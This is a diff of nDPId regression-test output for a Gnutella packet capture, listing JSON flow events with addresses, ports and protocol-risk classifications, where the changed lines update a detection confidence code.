00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287600,"flow_last_seen":287600,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.118.77","src_port":28681,"dst_port":62191,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":3256,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":3256,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287496,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3216,7 +3216,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":115369,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":2556,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":2556,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":28681,"dst_port":53143,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":28681,"dst_port":53143,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.194.73","src_port":28681,"dst_port":1995,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3249,7 +3249,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287621,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":28681,"dst_port":54459,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.172.10.90","src_port":28681,"dst_port":40162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":243618,"flow_last_seen":287682,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.172.10.90","src_port":28681,"dst_port":40162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287312,"flow_last_seen":287312,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"136.32.84.139","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287312,"flow_last_seen":287312,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"136.32.84.139","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":28681,"dst_port":1630,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3258,7 +3258,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287443,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287624,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.93.150.146","src_port":28681,"dst_port":62507,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287624,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.93.150.146","src_port":28681,"dst_port":62507,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53516,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287485,"flow_last_seen":287485,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":28681,"dst_port":53516,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.18.211.177","src_port":28681,"dst_port":18085,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3287,7 +3287,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287342,"flow_last_seen":288307,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":28681,"dst_port":33527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.36.234.196","src_port":28681,"dst_port":11629,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.36.234.196","src_port":28681,"dst_port":11629,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287599,"flow_last_seen":287599,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52669,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287599,"flow_last_seen":287599,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52669,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":28681,"dst_port":1512,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3296,7 +3296,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287622,"flow_last_seen":287622,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":8349,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287869,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.203.72.224","src_port":28681,"dst_port":9897,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287869,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.203.72.224","src_port":28681,"dst_port":9897,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
